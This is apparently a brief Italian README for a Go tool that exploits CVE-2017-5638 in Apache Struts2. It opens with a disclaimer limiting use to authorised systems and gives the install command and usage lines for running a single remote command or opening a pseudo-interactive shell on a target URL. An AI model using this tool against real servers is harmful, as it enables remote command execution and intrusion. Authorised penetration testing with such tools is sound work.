
Exploit in Golang per CVE-2017-5638
Utilizza questo exploit solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test
Se hai già go installato sul tuo computer, go get è la strada giusta
go get github.com/Greynad/struts2-jakarta-inject
Esecuzione di un singolo comando
struts2-jakarta-inject -u <url> -c 'id'
Shell pseudo interattiva
struts2-jakarta-inject -u <url> -i